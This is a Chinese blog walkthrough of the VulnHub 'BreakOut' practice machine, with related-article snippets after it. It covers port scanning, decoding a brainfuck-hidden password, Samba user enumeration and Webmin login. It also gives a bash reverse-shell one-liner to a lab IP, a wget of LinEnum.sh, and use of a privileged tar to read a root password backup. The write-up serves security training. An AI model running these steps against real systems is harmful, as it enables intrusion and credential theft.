vuln靶机--BreakOut

最新推荐文章于 2024-05-03 11:58:47 发布
最新推荐文章于 2024-05-03 11:58:47 发布
阅读量1k 收藏 2
点赞数
文章标签: p2p linq gnu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bobo_milk/article/details/124830281
版权

一、信息收集

常规的主机发现以及端口扫描,扫描自己所在的网段。

nmap 192.168.216.0/24
nmap -A -v -T4 -p 1-65535 192.168.216.149

可以看到服务器开启了80端口,139和445端口是samba服务,实现文件共享,10000和20000端口则是搭建了cms,而且版本也暴露了出来。

二、漏洞发现

首先先来查看80端口,只是一个普通的apache的index文件,apache的版本也比较高,因此并没有发现漏洞

在查看了源代码后,在底部发现了一段加密过的字符串,通过网上搜查到这是一段brainfuck加密

在线网站brainfuck加解密:Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]

解密后得到:.2uqPEfj3D<P'a-3

接着对80端口进行目录扫描

但是并没有有用的信息。

接下来探测10000端口和20000端口

2个端口都是这样一个登录页面,但是2个cms版本不一样,从页面上看到这是一个webmin的cms。在网上查找该cms的漏洞,但是cve很多,一个个尝试需要时间,因此先放一放。

samba服务可以使用enum4linux工具来枚举用户

enum4linux 192.168.216.149

爆出了一个用户cyber,结合上面找出的密码.2uqPEfj3D<P'a-3,直接尝试登录。

10000端口失败

20000端口成功

在这里找到了一个command shell,打开得到第一个flag。

三、权限提升

查看该用户下的文件,有一个tar命令是root权限。

先反弹shell到kali下,方便后续提权

bash -c 'exec bash -i &>/dev/tcp/192.168.216.128/8888 <&1'

反弹成功

接着信息收集,查看系统版本

版本较新,搜索exp后发现没有漏洞。

上传信息收集脚本,现在kali上搭建http服务,然后在服务器下载脚本文件

python -m SimpleHTTPServer 8080
wget http://192.168.216.128:8080/LinEnum.sh

运行LinEnum.sh文件,查看suid文件,并没有发现可利用之处。

suid提权一般有find、cp、nmap、vim、bash、more、less、nano等常见命令

在最后发现一个可疑文件.old_pass.bak,怀疑是存储了以前的密码,但是是root权限,当前用户并不能查看,联想到上面的root权限的tar文件,因此可以使用tar命令对该文件进行压缩和解压的操作,这样权限就变成了当前用户。

./tar -czvf passwd.tar.gz /var/backups/.old_pass.bak
./tar -xzvf passwd.tar.gz
cat /var/backups/.old_pass.bak

查看文件后得到一个密钥:Ts&4&YurgtRX(=~h

尝试登录到root

权限提升成功,完结!!!

总结

samba服务可以使用enum4linux工具来枚举

brainfuck加密

cve的获取

root权限二进制文件

一元二次方
关注
vuln-dev-env
02-20
开发环境要求: 虚拟箱6.1 流浪汉遵循的步骤: 通过运行以下命令将此仓库克隆到您的主机中: vagrant up 使用以下凭据登录到虚拟机: username: vagrant password: vagrant 运行配置脚本: sudo ./scripts/dev-env....
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 892
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
记录一次vuln靶场的渗透过程---driftingblues9
bobo_milk的博客
05-06 1252
一次小渗透记录 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决.
vuln靶场--MoneyBox
bobo_milk的博客
05-12 950
文章目录 一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 ​​​​ nmap -A -v -T4 -p 1-65535 192.168.216.145 可以看到服务器开启了80端口和22ssh的端口和21端口以及一些服务器的信息,网站搭建的中间件以及版本等等信息。 二、漏洞发现 访问服务器的80端口 一个非常普通的网站,在目前来看并不能发现什么业务功能,查看了一下源代码发现中间的按...
Vuln靶机系列:02TiKi-CMS漏洞利用-对新手非常友好!!!
weixin_45965246的博客
09-17 282
首次使用CMS漏洞该靶机通过的方式有多种,比如:sudo提权、Ubuntu提权使用到的python脚本挺多查看Ubuntu版本使用base64编码写入webshellSmarty沙盒绕过漏洞-RCE反弹shell。
内网渗透--vulntarget-a
m0_66299232的博客
04-04 1045
1.探测到6379端口,这个端口是redis容易造成未授权访问漏洞,可进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。config set dir "C:/phpStudy/PHPTutorial/WWW/" //切换目录。1.由于靶机开放445端口,并且是win7主机,启动msf进行探测、利用。2.用扫描模块探测主机可能存在永恒之蓝漏洞,进行漏洞利用攻击。11.拿到管理员hash,执行提权exp,成功拿下域控!2.成功连接到redis服务,访问成功,不需要密码。
02-Breakout靶机实战思路总结(读取任意文件提权,smb协议,Enum4linux)
qq_39641273的博客
06-12 447
这个主机不算很难,对于新手难度适中,可以尝试练手,如果没有思路本篇文档可供参考。知识点:smb协议,Enum4linux,文件任意读取,brainfuck编码。
nmap-vuln-scan
02-18
对于“nmap-vuln-scan-master”这个项目,它很可能是包含了一套完整的Nmap漏洞扫描解决方案,包括C#代码、配置文件、扫描策略和可能的自定义NSE脚本。深入研究这个项目,可以帮助我们更好地理解和实践Nmap在C#环境下...
vuln-cookies:饼干vukn
03-30
追捕后端 适用于vmc-cloud Project Vulnhunting的API REST 在位于config / config.json中的文件中配置数据库凭据 安装依赖项npm install 创建数据库npm运行create-db 运行迁移npm run migration-db ...
ThinkPHP-Vuln-master.zip
08-05
本篇文章将聚焦于"ThinkPHP-Vuln-master.zip"这个压缩包中的内容,深入探讨ThinkPHP历史上的几个关键漏洞,帮助开发者理解并防范潜在的安全风险。 1. **远程代码执行(Remote Code Execution, RCE)漏洞** 在...
lcx-vuln.cn.zip
最新发布
08-04
lcx-vuln.cn.zip
Vuln靶机系列:01Ai-Web1-渗透测试综合利用-对新手非常友好!!!
weixin_45965246的博客
09-17 421
首次使用sqlmap对web系统注入shell文件(之前一直以为只是获取账密)对目录扫描更深一步的理解,之前很少会有目录扫描,压根不想扫最关键一步就是–os-shell不能使用报错注入方式注入首次完整提权过程,之前没有接触过提权,也仅仅是了解没有实战对新手非常友好,是一个值得巩固知识体系的靶场。/etc/passwd的用户添加格式可能需要记录一下用户名:密码:UID(用户ID):GID(组ID):描述性信息:主目录:默认Shell。
vuln靶场——DC-1
qq_54480761的博客
05-03 1480
我们切换语句进入shell,执行whoami查看当前的权限,执行ls查看当前目录下的文件,切换到root目录。典型的drupal,启动Metersploit,MSF存在drupal模块,尝试使用msf渗透。查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件。搜索Drupal 7的漏洞发现可利用的漏洞很多,搜索与Drupal 7相关的漏洞利用模块。登陆战点之后,随便点几个选项,例如左上角的Content,发现flag3。进行登录,密码是之前我们自己替换的。
带你玩转渗透测试靶场Vulnhub——Android4
m0_74025111的博客
05-05 850
安卓(Android)是一种基于Linux内核(不包含GNU组件)的自由及开放源代码的操作系统。主要使用于移动设备,如智能手机和平板电脑,由美国Google公司和开放手机联盟领导及开发。Android操作系统最初由安迪·鲁宾开发,主要支持手机。2005年8月由Google收购注资。2007年11月,Google与84家硬件制造商、软件开发商及电信营运商组建开放手机联盟共同研发改良Android系统。随后Google以Apache开源许可证的授权方式,发布了Android的源代码。第一部Android智能手机
02-breakout靶机实验实战演练
lianliandad的博客
11-10 913
好好好好
Vulnhub_breackout靶机渗透测试
m0_66225311的博客
09-15 134
本次靶机对我来说还是比较难的,因为很多知识点都没有很好的接触过,都是第一次见,也从中学到了很多知识首先就是注释中的加密后的字符串了,因为有CTF密码学方向的学习,所以还是有所察觉的接下来就是enum4linux工具对smb服务的信息收集操作了,增加了对smb服务利用的知识点本次获取shell的操作可以说很简单了,网站直接就有可以执行shell的功能。
VulnHub靶机渗透实战7-BREAKOUT
随心所欲不逾矩
11-18 363
靶机超级简单。靶机和Kali桥接。
Vulnhub靶机渗透之权限提取,SMB泄露问题-靶场Breakout--学习笔记
ZhangAweio的博客
04-09 769
Vulnhub的这个靶场非常适合新手的朋友,里面包含了 信息收集,密码解密,SMB共享文件泄露备份文件泄露,通过泄露的密码进行Linux提权。
【打靶记录】VulnHub-stapler靶机渗透wp
qq_39972370的博客
02-12 1160
这是一个适合初学者到中级水平的虚拟机。它有一些挑战,但不会过于复杂。至少有两条路径可以获得一个有限权限的shell。至少有三种方法可以获得root权限。
nmap --script=vuln
06-28
### 回答1: nmap --script=vuln是一个nmap命令,用于扫描目标主机的漏洞。该命令会使用nmap的漏洞扫描脚本(vuln)来检测目标主机上可能存在的漏洞。使用该命令可以帮助管理员及时发现并修复系统中的漏洞,提高系统的安全性。 ### 回答2: nmap是一种常用的网络扫描工具,可以用来检测网络上的设备并识别它们的服务和操作系统信息。同时,nmap还提供了一些强大的脚本和工具箱,以帮助用户发现系统中可能存在的漏洞。 使用“nmap --script=vuln”命令可以使用nmap内置的漏洞扫描脚本,这些脚本能够检测目标系统中可能存在的安全漏洞。该命令会启用所有的漏洞扫描脚本,并提供有关目标系统检测结果的详细信息。 在使用“nmap --script=vuln”命令进行漏洞扫描时,可以通过在命令行上使用“-p”参数来指定要扫描的端口范围。对于大型网络中的目标系统,也可以通过指定IP地址范围或使用文件来进行扫描。 当nmap执行漏洞扫描脚本时,脚本会自动检测目标系统中存在的漏洞并生成报告。该报告包含了有关检测到的漏洞的详细信息,例如漏洞名称、等级和漏洞对应的CVE编号等。在扫描过程中,可以使用“-vvv”参数来显示更详细的扫描信息,以便更好地了解扫描的情况。 对于系统管理员和安全专业人士来说,nmap的漏洞扫描功能对于确保系统安全和保护系统免受攻击至关重要。然而,使用该命令进行系统扫描和漏洞检测需要谨慎,因为它可能会导致系统故障或误报漏洞。在使用nmap进行系统扫描之前,确保您已经获得同意,并且对扫描的目标系统进行备份和恢复。 ### 回答3: nmap是一款用于扫描网络主机的开源工具,其功能强大,支持多种操作系统。nmap自带的脚本能够实现许多针对主机的基本漏洞测试,其中就包括vuln脚本。 nmap --script=vuln是指使用vuln脚本来扫描目标网络主机,该脚本是nmap自带的一个组件,用于检测主机是否存在已知的漏洞。如果存在漏洞,则通过输出详细的报告提供可能存在的风险。 使用vuln脚本的方式简单直接,只需要在nmap命令行后加上--script=vuln即可进行扫描。扫描完毕后,nmap会输出详细报告,包含目标主机的漏洞及可能受到的影响。 总体来说,nmap --script=vuln用于检测目标网络主机的漏洞并提供风险报告,有效促进网络安全运营。但是需要注意的是,该脚本只能检测到已知的漏洞,因此不能完全替代其他安全测试工具的使用。在实际应用中,应该综合考虑多种工具的使用,提升网络安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值